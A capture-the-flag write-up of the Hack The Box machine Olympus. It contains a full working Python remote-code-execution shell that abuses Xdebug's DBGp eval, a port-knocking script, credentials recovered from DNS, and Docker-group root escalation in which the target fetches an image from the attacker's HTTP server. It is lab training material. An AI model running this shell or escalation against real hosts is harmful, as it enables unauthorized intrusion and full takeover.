Olympus Write-up (HTB)
This is a write-up for the recently retired Olympus machine on the Hack The Box platform. If you don’t already know, Hack The Box is a website where you can further your cybersecurity knowledge by hacking into a range of different machines.
TL;DR: Xdebug shell & Docker privesc.

At the time of writing, Olympus has been my favourite box on the platform, because both User and Root were split into separate stages, which added to the challenge. At each stage we were also given a small hint: enough for a rough idea of what to look into, without giving too much away.
PART ONE: USER
Let’s begin with an nmap scan.
The scan returns quite a lot of output, but the crucial part is the four ports it reports: 22 (SSH, which shows as filtered), 53 (DNS), 80 (HTTP) and 2222 (SSH). Since the SSH versions look fairly recent, let’s take a look at the web page first.
There doesn’t seem to be much information here. I also checked the page source for clues, but there was very little there. With so little to work from, I tried a dirb scan:
george@kali:~/htb/olympus$ dirb http://10.10.10.83/

-----------------
DIRB v2.22
-----------------

URL_BASE: http://10.10.10.83/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

---- Scanning URL: http://10.10.10.83/ ----
+ http://10.10.10.83/favicon.ico (CODE:200|SIZE:67646)
+ http://10.10.10.83/index.php (CODE:200|SIZE:314)
+ http://10.10.10.83/server-status (CODE:403|SIZE:222)

-----------------
Before long it found these three files, but they were all useless (other than index.php, which at least confirms that the server runs PHP). After spending some more time enumerating, I looked at a simple request in Burp to see exactly what the server sends back:
There is a slightly unusual header in the response: “Xdebug”. Some reading showed that Xdebug is a PHP extension that provides step debugging and profiling during development. When its remote debugging is enabled and configured to connect back to whoever triggers it, a request that starts a debug session makes the server open a DBGp connection to the client, and that protocol’s eval command executes arbitrary PHP. That is the whole vulnerability: a debugging feature left switched on in production. Searching for related exploits brought me to this script, which uses exactly that to give us a shell through Xdebug. I saved it to my machine and tested it out:
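To make the mechanism concrete, here is a minimal Xdebug eval shell of my own. It is an added example, not the script linked above, and it assumes an Xdebug 2.x setup with xdebug.remote_enable=1 and xdebug.remote_connect_back=1 (or xdebug.remote_host pointing at the attacker), so that a request carrying XDEBUG_SESSION_START makes PHP connect back to port 9000, the xdebug.remote_port default; the target address, path and port numbers below are placeholders. The two DBGp pieces that matter are the framing (a decimal length, a NUL, the XML, a NUL) and the eval command, whose argument is base64-encoded PHP. The sample response used in the tests is constructed.

```python
"""Minimal Xdebug remote-debug (DBGp) 'eval' shell.

Added example; not the script the write-up links to. Assumes Xdebug 2.x with
xdebug.remote_enable=1 and xdebug.remote_connect_back=1 (or xdebug.remote_host
set to our address): a request carrying XDEBUG_SESSION_START makes PHP connect
back to port 9000 (the xdebug.remote_port default). Xdebug 3 renamed these to
xdebug.mode=debug, xdebug.start_with_request and xdebug.client_port (default 9003).
"""
import base64
import socket
import sys
import xml.etree.ElementTree as ET

DBGP_NS = {"d": "urn:debugger_protocol_v1"}


def build_eval_command(txid, php_expr):
    """DBGp command line: 'eval -i <txid> -- <base64(expr)>' terminated by a NUL."""
    data = base64.b64encode(php_expr.encode()).decode()
    return f"eval -i {txid} -- {data}\0".encode()


def bytes_reader(data):
    """recv(n)-style callable over an in-memory buffer (for offline testing)."""
    buf = bytearray(data)

    def recv(n):
        out = bytes(buf[:n])
        del buf[:n]
        return out
    return recv


def read_dbgp_message(recv):
    """Read one DBGp frame: '<decimal length>\\0<xml>\\0'."""
    length = b""
    while True:
        ch = recv(1)
        if not ch:
            raise EOFError("connection closed while reading frame length")
        if ch == b"\0":
            break
        length += ch
    size = int(length)
    body = b""
    while len(body) < size:
        chunk = recv(size - len(body))
        if not chunk:
            raise EOFError("connection closed mid-frame")
        body += chunk
    recv(1)  # trailing NUL
    return body.decode("utf-8", "replace")


def parse_eval_response(xml_text):
    """Return the evaluated value from an eval <response>; raise on a DBGp <error>."""
    root = ET.fromstring(xml_text)
    err = root.find("d:error", DBGP_NS)
    if err is not None:
        msg = err.find("d:message", DBGP_NS)
        raise RuntimeError(f"DBGp error {err.get('code')}: {msg.text if msg is not None else ''}")
    prop = root.find("d:property", DBGP_NS)
    if prop is None:
        prop = root.find("property")  # tolerate a response without the default namespace
    if prop is None:
        raise RuntimeError("no <property> in eval response")
    text = (prop.text or "").strip()
    if prop.get("encoding") == "base64":
        return base64.b64decode(text).decode("utf-8", "replace")
    return text


def php_quote(s):
    """Single-quoted PHP string literal."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def xdebug_shell(target, port=80, path="/index.php", listen_port=9000):
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", listen_port))
    srv.listen(1)
    # Send the trigger request raw and do NOT wait for the HTTP response:
    # PHP will not finish the request until the debug session ends.
    http = socket.create_connection((target, port), timeout=5)
    http.sendall(f"GET {path}?XDEBUG_SESSION_START=1 HTTP/1.1\r\nHost: {target}\r\n\r\n".encode())
    conn, peer = srv.accept()
    print(f"[+] Xdebug connected back from {peer[0]}")
    read_dbgp_message(conn.recv)  # the <init> packet
    txid = 1
    while True:
        try:
            cmd = input(">> ").strip()
        except EOFError:
            break
        if not cmd:
            continue
        # Each command is a fresh shell_exec(), so state such as `cd` does not persist.
        conn.sendall(build_eval_command(txid, f"shell_exec({php_quote(cmd)})"))
        try:
            print(parse_eval_response(read_dbgp_message(conn.recv)), end="")
        except (RuntimeError, EOFError) as e:
            print(f"[-] {e}")
        txid += 1
    conn.close()
    http.close()
    srv.close()


if __name__ == "__main__":
    xdebug_shell(sys.argv[1] if len(sys.argv) > 1 else "10.10.10.83")
```

The trigger request is deliberately never read: a normal HTTP client would block on the response, but PHP only finishes that request once the debug session is over, so the two would deadlock. Because every command is a separate shell_exec(), nothing like a working directory survives from one line to the next.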
After enumerating the file system for a bit, I found the following (note: “cd” doesn’t work with this script; each command is run on its own, so the working directory is not kept between them):
>> ls /home
zeus
>> ls /home/zeus
airgeddon
>> ls /home/zeus/airgeddon
CHANGELOG.md
CODE_OF_CONDUCT.md
CONTRIBUTING.md
Dockerfile
LICENSE.md
README.md
airgeddon.sh
binaries
captured
imgs
known_pins.db
language_strings.sh
pindb_checksum.txt
>> ls /home/zeus/airgeddon/captured
captured.cap
papyrus.txt
>>
Let’s now take a look at these files…
>> cat /home/zeus/airgeddon/captured/papyrus.txt
Captured while flying. I'll banish him to Olympia – Zeus
>> cat /home/zeus/airgeddon/captured/captured.cap
>>
That is a binary capture file, so the script can’t print it. Let’s copy it over to our local machine by Base64-encoding it on the box:
>> base64 /home/zeus/airgeddon/captured/captured.cap
1MOyoQIABAAAAAAAAAAAAP//AABpAAAAiQ/KWhnGBwANAQAADQEAAIAAAAD////////07DirqKn07DirqKkwU4BN/QcAAAAAZAAxBAAUVG9vX2NsMHNlX3RvX3RoM19TdW4BCIKEi5YMEhgkAwEIBQQAAQAAKgEAMBQBAAAPrAQBAAAPrAQBAAAPrAIAADIEMEhgbN0YAFDyAgEBhQADpAAAJ6QAAEJDXgBiMi8A3R4AkEwzThEb/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtGk4RG/8AAAAAAAAAAAAAAAAAAAAAAAAAAAAA3RoAkEw0CA8KAAAAAAAAAAAAAAAAAAAAAAAAAD0WCA8KAAAAAAAAAAAAAAAAAAAAAAAAAN0JAAN/AQEAAP9/3QoAA38EAQAAAEAAiQ/KWhlMCgDVAAAA1QAAAAhCAAABAF5///r07DirqKm0tS+Q+xlABREAAGAAAAAAaw2N2NDWKng8JbsBpVACtfT/japlzX5NsHGeF+9PXURMIuqBnxUMvS5HwmYARmoqe+U4fPHuJOuQfxA1HIaLIy7orpRB/rb4zIVJQLjGZsm/wUO7u5mEI2dpGuy3RubPJIrIiivKvTj+/2Xd+RI94cJlKYNHueCJuWe1y6GBdUdLVhiGZcQ01b2B90ymG0qTimsQDOpoS8E1KmLG5/EDJPxvyeYPXIgqAESDV7tdVdr6FNK7EYkPylpAjg4AGgAAABoAAADAADoB////////9Ow4q6i
>>
Now, on our local machine, all we have to do is decode this and write the output to a new file. With the capture restored, we can inspect it with tcpdump:
As shown, the capture holds 802.11 beacon frames for a network whose SSID is “Too_cl0se_to_th3_Sun”, which looks very much like a password, so I figured it was time to try SSH. I spent some time looking for a possible username, but it turns out we just had to guess it from the contents of papyrus.txt: as the clue suggests, the user is icarus. We also have to use port 2222, since port 22 is filtered.
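For anyone who would rather read the capture without tcpdump, or wants to see where that string actually lives in the file, here is a small parser I wrote for this write-up (it is an added example, not the author’s code). It walks a classic pcap file with link type 105 (raw 802.11, which is what the magic and link-type bytes at the start of the Base64 above decode to) or 127 (radiotap), and reports the SSID carried in every beacon or probe-response frame. The one-frame sample it builds is constructed here to mirror the first frame of captured.cap; it is not the real file, and pcapng is deliberately not handled.

```python
"""Pull SSIDs out of an 802.11 capture such as captured.cap.

Added example (not from the write-up): parser for the classic pcap format with
link types 105 (raw 802.11) and 127 (radiotap). The sample capture built by
build_sample_pcap() is constructed to mirror the first frame of captured.cap
(one beacon for SSID Too_cl0se_to_th3_Sun); it is not the real file.
"""
import struct
import sys

PCAP_MAGIC_LE = b"\xd4\xc3\xb2\xa1"
PCAP_MAGIC_BE = b"\xa1\xb2\xc3\xd4"
DLT_IEEE802_11 = 105
DLT_IEEE802_11_RADIO = 127


def beacon_ssid(frame):
    """Return (bssid, ssid) for a beacon/probe-response frame, else None."""
    if len(frame) < 36:                       # 24-byte MAC header + 12 bytes of fixed fields
        return None
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    if ftype != 0 or subtype not in (8, 5):   # management frames: beacon (8), probe response (5)
        return None
    bssid = ":".join(f"{b:02x}" for b in frame[16:22])   # addr3
    pos = 36
    while pos + 2 <= len(frame):              # tagged parameters: id, length, value
        tag, ln = frame[pos], frame[pos + 1]
        if tag == 0:                          # tag 0 = SSID
            return bssid, frame[pos + 2:pos + 2 + ln].decode("utf-8", "replace")
        pos += 2 + ln
    return None


def extract_ssids(pcap):
    """Walk every record of a classic pcap file and collect (bssid, ssid) pairs."""
    magic = pcap[:4]
    if magic == PCAP_MAGIC_LE:
        end = "<"
    elif magic == PCAP_MAGIC_BE:
        end = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    linktype = struct.unpack(end + "I", pcap[20:24])[0]
    if linktype not in (DLT_IEEE802_11, DLT_IEEE802_11_RADIO):
        raise ValueError(f"link type {linktype} is not 802.11")
    found, off = set(), 24
    while off + 16 <= len(pcap):
        incl_len = struct.unpack(end + "I", pcap[off + 8:off + 12])[0]
        off += 16
        frame = pcap[off:off + incl_len]
        off += incl_len
        if linktype == DLT_IEEE802_11_RADIO:
            if len(frame) < 4:
                continue
            rt_len = struct.unpack("<H", frame[2:4])[0]   # radiotap length is always little-endian
            frame = frame[rt_len:]
        hit = beacon_ssid(frame)
        if hit:
            found.add(hit)
    return found


def build_sample_pcap(radiotap=False):
    """Constructed one-frame capture: a beacon from f4:ec:38:ab:a8:a9 for the SSID."""
    ssid = b"Too_cl0se_to_th3_Sun"
    bssid = bytes.fromhex("f4ec38aba8a9")
    mac_hdr = b"\x80\x00\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x30\x53"
    fixed = b"\x00" * 8 + struct.pack("<HH", 100, 0x0431)   # timestamp, interval, capability
    tags = bytes([0, len(ssid)]) + ssid + bytes([1, 8]) + bytes.fromhex("82848b960c121824")
    frame = mac_hdr + fixed + tags
    linktype = DLT_IEEE802_11
    if radiotap:
        frame = b"\x00\x00" + struct.pack("<H", 8) + b"\x00" * 4 + frame   # 8-byte empty radiotap header
        linktype = DLT_IEEE802_11_RADIO
    ghdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)
    rhdr = struct.pack("<IIII", 1523060617, 0, len(frame), len(frame))
    return ghdr + rhdr + frame


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pcap()
    for bssid, ssid in sorted(extract_ssids(data)):
        print(f"{bssid}  {ssid!r}")
```

Run it with the decoded captured.cap as the only argument; with no argument it parses its own constructed sample. The SSID is an information element in the beacon, so it is visible to anyone in range and to anyone holding the capture, which is exactly why it turns up in strings-style inspection of the file.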
As shown in the screenshot, we still don’t have the user flag; instead we get another hint, which includes a domain name. Since we have a domain (ctfolympus.htb) and the box runs DNS on port 53, let’s use dig to enumerate it further. A zone transfer (dig’s axfr query against the box’s nameserver) is the usual way to dump every record at once, and the output below is in that zone-file format:
We can now immediately see some interesting entries:
- ctfolympus.htb. 86400 IN TXT “prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!”
- RhodesColossus.ctfolympus.htb. 86400 IN TXT “Here lies the great Colossus of Rhodes”
- hades.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
Let’s begin with the first entry. It gives us what looks like a username (“prometheus”), a password (“St34l_th3_F1re!”) and three interesting numbers. Since the text says we must “open a temporal portal”, we can infer that the numbers are used to open a service. This all points to port knocking: a daemon watches for connection attempts to a specific sequence of ports and only then opens the real one.
To do this we first install the knockd package, which also ships the knock client, and then send the three ports in the order given:
Terminal 1: An initial nmap scan — Port 22 is filtered.
Terminal 2: We perform the port knocking.
Terminal 3: A second nmap scan — Port 22 has opened!
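The same three steps with plain sockets, so that what the knock client is doing is explicit. This is an added example, not the author’s commands: it parses the port list out of the TXT record text quoted above, sends one TCP connect attempt per port in order (knockd watches for the SYNs, so the refused or timed-out connections are expected), and checks port 22 before and after. The host address is the box’s IP as used elsewhere in this write-up; the knockd timeouts mentioned in the comments are the ones from the package’s stock example configuration and are an assumption about this box.

```python
"""Port knocking with plain TCP connect attempts.

Added example, not the write-up's commands. HINT is the TXT record text from
the dig output above; the host defaults to the box address used in the post.
"""
import re
import socket
import sys
import time

HINT = "prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"


def parse_knock_hint(txt):
    """Return the bracketed port list from the TXT record as ints, in order."""
    m = re.search(r"\(([\d\s]+)\)", txt)
    if not m:
        raise ValueError("no (port list) found in record")
    return [int(p) for p in m.group(1).split()]


def _tcp_connect(host, port, timeout):
    """One connect attempt; True if it completed, False on refusal, timeout or no network."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def knock(host, ports, timeout=0.3, delay=0.2):
    """Send one SYN per port in the given order and return the ports knocked.

    knockd only looks at the SYNs, so the connections are expected to fail; the
    order and timing are what matter. The whole sequence must arrive inside
    knockd's seq_timeout (5 s in the stock example config, assumed here).
    """
    sent = []
    for port in ports:
        _tcp_connect(host, port, timeout)
        sent.append(port)
        time.sleep(delay)
    return sent


def port_open(host, port, timeout=2.0):
    """A filtered (dropped) port simply times out, so this is False both before and on failure."""
    return _tcp_connect(host, port, timeout)


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.83"
    seq = parse_knock_hint(HINT)
    print(f"[*] before knocking: port 22 open = {port_open(host, 22)}")
    knock(host, seq)
    # knockd closes the port again after cmd_timeout (10 s in the stock example
    # config), so start the SSH connection promptly after the knock.
    print(f"[*] after knocking:  port 22 open = {port_open(host, 22)}")
```

Two things trip people up here: the knocks must be in the configured order and within the daemon’s sequence timeout, and the opened port is usually closed again a few seconds later, so the SSH connection should follow immediately.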
Now that this port is open, let’s SSH in with the credentials supplied earlier:
I’ve been told that this wasn’t actually the intended route, and that there was supposed to be another stage in between the two users. But if it works, it works.
PART TWO: ROOT
Let’s take a look inside the home directory:
At the moment this tip doesn’t seem very useful. While enumerating my user I ran groups, which gave the following output:
prometheus@olympus:~$ groups
prometheus cdrom floppy audio dip video plugdev netdev bluetooth docker
While enumerating a different box, I had gone down a rabbit hole and accidentally learnt a lot about Docker privilege escalation, which only requires the user to be in the docker group. Membership of that group is effectively root: the Docker daemon runs as root and will happily mount the host’s filesystem into a container. Because of this, the docker group immediately piqued my interest.
A Google search reveals a good PoC by Chris Foster, which pulls off the privesc in a single command:
> docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
Let’s try using docker to pull the chrisfosterelli/rootplease image:
As with all HTB boxes, the machine has no internet access, so the pull fails. Instead (as the hint suggests), we have to serve the image to the box ourselves: pull rootplease on the local machine, save it to a tarball, serve it over a Python HTTP server, and load it on the box. The image itself just chroots into the host filesystem mounted at /hostOS, so any image already present on the box (listed by docker images) could do the same job with a one-liner; pulling rootplease is simply convenient. If you need help setting up Docker on Kali, just follow this tutorial.
I’ll run through the commands that I used here:
[local] >> sudo service docker start
[local] >> sudo docker pull chrisfosterelli/rootplease
[local] >> sudo docker save -o rootplease.tar chrisfosterelli/rootplease
[local] >> python -m SimpleHTTPServer 5555
[olympus] >> wget http://10.10.15.243:5555/rootplease.tar (This may take some time.)
[olympus] >> docker load -i rootplease.tar
With that now loaded, let’s try running the command mentioned earlier:
Now that we are root, we can read the root flag.